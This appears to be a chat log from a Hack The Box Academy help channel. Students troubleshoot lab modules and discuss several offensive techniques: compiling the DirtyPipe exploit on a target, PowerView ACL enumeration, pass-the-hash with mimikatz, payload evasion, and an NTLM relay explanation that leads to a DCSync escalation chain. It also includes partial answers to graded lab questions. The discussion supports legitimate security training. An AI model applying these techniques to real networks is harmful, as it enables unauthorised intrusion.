The question asked for a shell lol I will try to just read the flag from the injection
Does it? It's been a minute
I'm on windows evasion SA1 - my payload passes both checks, but seems to get some sort of timeout error in the logs? If I run it manually on the host it runs fine, any advice?
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
can someone help me with a question in intro to assembly?
i dont understand this part
Anyone able to help me?
You can DM.
Just see what you can and can't do from what I recall
What is the latest Python version that is installed on the target?
Cgi can be tricky with capitalization
stepped into the exit function but the hex values I have tried aren't working ?
Have you tried listing and grepping for "python"
Is it including the leading 0s?
No just 0x######
just got it, ty tho!
for some reason gef has the top address of the stack colored by the "code" color instead of stack?
same module - any idea why it doesn't connect? couldn't figure it out from the section.
Working on Connecting to Wi-Fi Networks?
Tick 'No CA certificate is required' and set the Authentication type to PEAP.
Optionally you can connect using CLI as shown in the section.
Yes that module
Thank You It worked
More of a general question: other escape characters work, but \n, likely due to the slash itself, causes curl to never be sent. End just creates new lines...
I am on Fish terminal
What happens if you close the first command with something like ; and are you Dutch?
hello guys, i just took the student plan in htb academy and i am hesitant, should i take the SOC analyst job role path or the SOC analyst prerequisites in the skill path?
can anyone help me, when I'm trying to do
~C in the ssh prompt it's not dropping me into
ssh>
so i cant port forward
but instead it gives me commandline disabled error, but ippsec does it in the same box im doing, and it works.
Whats your command?
if you're confident in your abilities, like you know for sure you got the fundamentals down, then don't. but if you're just starting out do the prerequisites, it's pretty helpful
~C
Bro i asked in boxes nobody answered so im asking here but its same as port forwarding and tunneling module
Ok dm me.
If you mean the hosts file, no port.
Have you added inlanefreight.htb to your hosts file with the target ip:port?
Attacking Enterprise Networks - Post Exploitation
I'm in question 2
I cloned CVE-2022-0847
Then I did cat exploit-2.c | xclip -se c
But when I go back to the ssh, I run gcc exploit-2.c -o dirtypipe I get a fatal error message, no such file or directory
Anyone else finish this one? Any help, please?
Why are you using xclip -se c? Did you copy the exploit-2.c file to the target?
Because that's what I was told to do.
has anyone had issues with the phishing room in XSS?
Okay have you tried it without xclip, transfer the file?
The server at xx.xx.xx.xx is taking too long to respond.
The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer's network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the web.
I tried scp, but that didn't work
It worked fine for me earlier. Have you changed VPN regions or tried with pwnbox?
I have to step out, and pick up my daughter. But I can try http.server
haven't changed vpn, and when I tried with pwnbox it would work intermittently, I would click send, it works, then do the next bit and I get that error
Okay good luck.
But can you explain how?
In some rare instances when nothing really worked well, I switched from US to EU and got things to work.
just tried switching regions and it still doesnt work
I just spun it up on my end, with a US VPN connection and am having no issues.
Hello, I'm currently working on Detecting Windows Attacks with Splunk and I'm stuck on this question "Use the "dns_exf" index and the "bro:dns:json" sourcetype. Enter the attacker-controlled domain as your answer. Answer format: ." I'm not asking for the answer, I would like to be guided in the right direction if possible. Every answer I came up with was incorrect. I'm also not sure what the answer format should be.
nah no way
why is it not working for me
Not sure if you have a personal VPN on your host computer turned on, but sometimes that can skew things up.
no I dont, all the previous rooms worked just fine
and now Im having this issue with this randomly
Have you checked to see if you can access other sections from the module?
It's not trying to load the page as https is it?
previous ones work
yes it is even tho I set it as http
Force it to http
where do I do that again
You can DM
Can someone help me out for "Introduction to Windows Evasion Techniques" module? I'm on Skills Assessment I - If I run my payload using the LOLBIN directly on the victim host, it works fine & I get a reverse shell - all undetected & passing YARA rules, but if I wait for the automated user to run it, within the log.txt file it says timeout?
hi I am doing question 3 for the intro to the pass the hash section under password attacks and when I do what the instructions say it does not give me David's hash
I managed to get in via rdp and I can run the cmd.exe
but I cannot seem to get David's hash to show up even tho I did exactly what the section says to do as far as I can tell
can someone help me out here?
can I DM? In a similar position I think
Sure m8, it's been a while but if my notes are still relevant, I'll have a look
Not sure as the screenshot doesn't show your mimikatz command or output. You can DM that stuff if you'd like.
Can somebody please help with "Q: What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "
Module: Active Directory Directory Penetration Testing
Section: ACL Enumeration.
I have enumerated the ObjectAceType but the portal is not accepting the answer.
||I am trying bf9679c0-0de6 as an answer and also the AddSelf-GenericWrite which I got from bloodhound|| but both answers are incorrect.
Try PowerView
Ya, that powerview output in the screenshot
This is the command i ran "Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}" where $sid is SID of forend
You can shoot me a DM if you'd like.
Not sure if this would change much, but just from reviewing notes can you try this
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Thank you, Let me try that!
Sounds good, let me know if it works
Yeah you don't need to DM was gonna mention GUIDs,
attempting to do basic HTB module target
need to get root access as user2
search for SUIDs and use GTFObins to try and abuse them for 30 minutes
the id_rsa file sitting in roots home that user2 can access:

I don't know why this Get-DomainObjectACL command is taking forever to complete. It's been 10+ mins and still no output, is that normal? do you remember?
if it's a big domain with lots of objects then it will take a while
There was a Domain searching website in the CPTS path with like 30 search boxes on it. Anyone have that link handy? I just searched back through the course and can't find it
is it https://viewdns.info/?
That's it exactly, thank you!!
I immediately knew what you meant by "30 search boxes on it"
Still took a little digging through my notes to find it tho.
It works, Thank you!!
No problem! Happy to help
I seem to have regular problems when I try to do web related exercises (SQLi, SQLMap etc) from my PC. When I use the pwnbox, I do not have any kind of issue, but from my PC it does not work, or the answer hangs forever. Is it because of Cloudflare or something filtering this kind of attacks?
no, probably something else
Well from my PC i have this kind of output from SQLMap:
[CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
But this output is not present when I run from the pwnbox
i've never seen cloudflare pop up at all ever on any htb boxes
if the pwnbox can do it you should be able to as well
Yeah well, the behaviour is completely different for the same input and it happened as well on other modules too.
are you tunneling traffic through some kind of vpn?
Not at all.
not sure then, maybe reach out to support on the website
Will do. Thank you for trying to help me
Module: Attacking Common Services
I was just going through my notes and came across this attack vector that I'd completely forgotten about. In the section I've linked below, it states that if you're unable to crack the hash captured with responder, you should try relaying the hash.
In the example provided, they switch off SMB in responder's configuration and run the impacket-ntlmrelayx tool. In the command, the parameter -t specifies the target. How do I know what to target? Do I just target a server on the network with the SMB service?
Also, impacket-ntlmrelayx is run independently and not side-by-side with responder, right?
Link to section: https://academy.hackthebox.com/module/116/section/1167
it's either a host based firewall on your PC, or some type of WAF built into your router. There are ISPs that actively monitor for "suspicious" traffic passing through their devices. I remember years ago I had a classmate who was not able to do any bruteforcing out of her home network, she called her ISP and they were able to resolve it.
If you want to narrow it down, spin up a local web server with DVWA or some other vulnerable web app, and see if you can run SQLMap against it locally .
following directions i tried a sudo updatedb and tried to use the student password to get into the machine (seeing if it would work, not expecting anything of it) and it said that the student account wasn't allowed and the incident would be reported >.>... is that just on the machine and i have nothing to worry about or... >.>
you're fine, the target VM is just configured that way.
thank you so much!
if its Linux Fundamentals, the htb-student user does not have sudo permissions
you can check by running sudo -l
we are punishing you by making you use the find command instead
thats exactly the one im on find/locate lol
that is a weird looking capital i...
wait... i don't know anymore
or its a perfectly beautiful lowercase L
it just tried to have me login then i tried I
it depends on the attack. For example, in active directory you might be able to use something like PrinterBug to make a domain controller connect to you (via SMB). That connection is then relayed to an ADCS server, and the result is that you, the attacker, obtain a certificate saying you are the domain controller (as the machine account i.e. DC01$) . From there, you can DCSync the actual domain controller. Because the domain controller can't tell the difference between itself and you .
We have an entire module on NTLM Relay Attacks if you're interested. It's pretty gnarly.
But yes there are times you can run both ntlmrelayx and responder at the same time.
I see. So if I'm carrying this attack out, I'd have to pivot first with a tool like ligolo-ng and then set a listener for port 445 before carrying out the attack?
I'm currently revising to tackle the CPTS exam soon, but it definitely sounds interesting. I may check it out later, thanks for the suggestion!
So they can be run independently as well? In the case of the section I referenced, it's being run independently?
Why does general chat redirect me here?
Because you didn't read and follow instructions in #welcome?
IIRC it depends on if you're trying to do a cross-protocol relay attack. In such cases, you need to edit responder's config file to SMB = Off .
Oh probably, Ill go do that
A cross-protocol relay attack? In the section's example it does set SMB = Off in the config file.
so we could have Responder do LLMNR poisoning, while ntlmrelayx actually catches the hash and then relays it .
I see. But LLMNR poisoning wouldn't work since SMB = Off, no?
Ahh, wait, it shouldn't affect the poisoning aspect, only responder's ability to handle SMB-based NTLM relays?
yes i believe so
SMB = off just makes it so responder isn't actively listening on port 445. But it will still broadcast itself out as whatever mis-typed resource the victim tries to access.
so the victim tries to access \\servr01\share. He misspells server01. AD is stupid so it broadcasts to the entire network "who is servr01?"
Responder tells the victim, I am servr01 . So the victim then authenticates to us via SMB. If we want to relay it, then we use ntlmrelayx. But if we just want to capture the hash and try to crack it, then we only use responder, but have SMB = On
Is there a reason in that example why we're turning SMB off for responder? Also, what exactly is impacket-ntlmrelayx doing there? I get it relays any authentication to itself, but why are those other devices authenticating to it in the first place?
well i guess that doesn't make AD stupid. Just netbios and LLMNR. AD is stupid for a bunch of other reasons
Wait, so ntlmrelayx needs to be run side-by-side with responder then?
In this example, its showing a hypothetical scenario where an administrator (from 10.10.110.1) somehow tries to connect to us via SMB, but then we relay it to another host (10.10.110.146)
In this case, responder has SMB = Off , because we need ntlmrelayx to be listening on port 445.
Right, I understand that. I just wanted to confirm that responder isn't doing anything here, and that the only reason this relay attack is working is because the administrator from 10.10.110.1 is trying to authenticate to our relay (SMB service), for whatever reason?
there's quite a bit of nuance to it
Sorry to interrupt your conversation, I have a question. If I buy cubes on HackTheBox for any amount, will that give me unlimited access to the online attack-boxes, or do I specifically need to purchase the subscription?
I can't download Kali or Parrot right now, as the computer I'm using belongs to the school, and I don't have admin privileges.
Yes, you get unlimited pwnbox if you have a module
or if you buy any amount of cubes
Okay, thank you
getting this error again & again
Try either installing crackmapexec or using nxc.
yes, use nxc .
all the commands should work the same